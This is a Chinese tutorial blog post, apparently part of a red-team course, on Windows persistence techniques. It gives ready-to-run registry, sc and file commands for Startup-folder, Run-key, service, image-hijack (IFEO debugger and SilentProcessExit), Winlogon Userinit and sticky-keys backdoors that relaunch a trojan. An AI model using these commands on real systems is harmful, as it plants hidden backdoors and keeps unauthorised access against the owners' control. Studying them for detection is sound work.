当前位置: 首页 > news >正文

第143天:内网安全-权限维持自启动映像劫持粘滞键辅助屏保后门WinLogon

news 来源:原创 2024/9/20 13:26:05

案例一: 权限维持-域环境&单机版-自启动

自启动路径加载

路径地址

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\
##英文C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\开始菜单\程序\启动\   
##中文

把木马程序上传到目标文件夹

重启服务器

自启动服务加载 

命令 创建自动启动的服务

sc create ServiceTest binPath= C:\1.exe start= auto  ##创建服务
sc delete ServiceTest   ##删除服务

木马就设置在c:/1.exe

重启主机 ,查看服务

成功上线,并且一定是system权限

自启动注册表加载

自启动注册表用户以及系统目录

- 当前用户键值
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- 服务器键值(需要管理员权限)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

添加,需要管理员权限运行

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\1.exe"

成功上线

查看注册表信息

计时任务

不过多介绍,不会看这篇文章

第128天:内网安全-横向移动&IPC&AT&SC 命令&Impacket 套件&CS 插件&全自动_横向移动之ipc配合任务计划-CSDN博客

案例二:权限维持-域环境&单机版-映像劫持

注册表的位置

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

注册表里面有很多可执行程序

把notepad命令替换成为exe命令,管理员权限运行

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "cmd.exe" 
#添加REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /f
#删除

打开文本文档,直接会弹出exe,但是这样会比较可疑

正常你运行记事本后弹出这个窗口

配合GlobalFlag隐藏:执行记事本正常关闭,后触发别的程序,把后面的修改为自己想执行的程序即可

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\1.exe"

执行文件关闭后

成功上线

案例三:权限维持-域环境&单机版-屏保&登录

利用的是登陆的时候的运行的程序,在程序后面加上程序,就可以

注册表的位置

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

打开后可以看到后面默认有一个逗号,可以添加程序

修改注册表,把木马程序加进去,管理员权限运行

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\System32\userinit.exe,C:\1.exe"

 

这个时候注销或者是等屏幕自动息屏登录的时候,会触发这个程序

 登录成功以后会上线

案例四:权限维持-域环境&单机版-粘滞键

了解即可,目前新版本系统已经用不了了。

修改的命令

move sethc.exe sethc1.exe
copy cmd.exe sethc.exe

并且修改需要很高的权限,system权限在cs中也无法运行

就是在远程连接的时候,按五次shift,会触发粘滞键位,把这个修改为cmd就可以运行对面的cmd命令,也可以修改为木马直接执行。

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 探寻 IP 代理地址繁多之因
  • 【WPF】WPF学习之【二】布局学习
  • Spring Boot 部署(jar包)
  • 手机TF卡格式化后数据恢复:方法、挑战与预防措施
  • KRTS网络模块:UDP通信
  • MQ-7一氧化碳传感器详解(STM32)
  • (二)十分简易快速 自己训练样本 opencv级联lbp分类器 车牌识别
  • PostgreSQL的repmgr工具介绍
  • java基础-线程实现
  • 自己实现一个分布式锁
  • 【自然语言处理】调用NLTK数据失败‘wordnet‘和‘punkt‘不存在[Errno 11004]问题解决
  • BIO、NIO、AIO 有什么区别?
  • 机器学习模型中的因果关系:引入单调约束
  • 【SQL】常见语句合集
  • 景联文科技:专业图像采集服务,助力智能图像分析
  • 【399天】跃迁之路——程序员高效学习方法论探索系列(实验阶段156-2018.03.11)...
  • 【Linux系统编程】快速查找errno错误码信息
  • 2018以太坊智能合约编程语言solidity的最佳IDEs
  • Bootstrap JS插件Alert源码分析
  • co模块的前端实现
  • ECS应用管理最佳实践
  • egg(89)--egg之redis的发布和订阅
  • express + mock 让前后台并行开发
  • nginx(二):进阶配置介绍--rewrite用法,压缩,https虚拟主机等
  • niucms就是以城市为分割单位,在上面 小区/乡村/同城论坛+58+团购
  • PHP 使用 Swoole - TaskWorker 实现异步操作 Mysql
  • Phpstorm怎样批量删除空行?
  • Python打包系统简单入门
  • python学习笔记 - ThreadLocal
  • Python学习之路13-记分
  • Sublime Text 2/3 绑定Eclipse快捷键
  • Vue UI框架库开发介绍
  • 高程读书笔记 第六章 面向对象程序设计
  • 理解IaaS, PaaS, SaaS等云模型 (Cloud Models)
  • 让你的分享飞起来——极光推出社会化分享组件
  • 如何在 Tornado 中实现 Middleware
  • 算法-图和图算法
  • 我看到的前端
  • 我这样减少了26.5M Java内存!
  • MiKTeX could not find the script engine ‘perl.exe‘ which is required to execute ‘latexmk‘.
  • 【运维趟坑回忆录】vpc迁移 - 吃螃蟹之路
  • CMake 入门1/5:基于阿里云 ECS搭建体验环境
  • scrapy中间件源码分析及常用中间件大全
  • 函数计算新功能-----支持C#函数
  • ​LeetCode解法汇总1410. HTML 实体解析器
  • ​ssh免密码登录设置及问题总结
  • ​插件化DPI在商用WIFI中的价值
  • ​直流电和交流电有什么区别为什么这个时候又要变成直流电呢?交流转换到直流(整流器)直流变交流(逆变器)​
  • #if 1...#endif
  • (04)odoo视图操作
  • (2)关于RabbitMq 的 Topic Exchange 主题交换机
  • (27)4.8 习题课
  • (8)STL算法之替换
  • (vue)页面文件上传获取:action地址
  • (笔记)M1使用hombrew安装qemu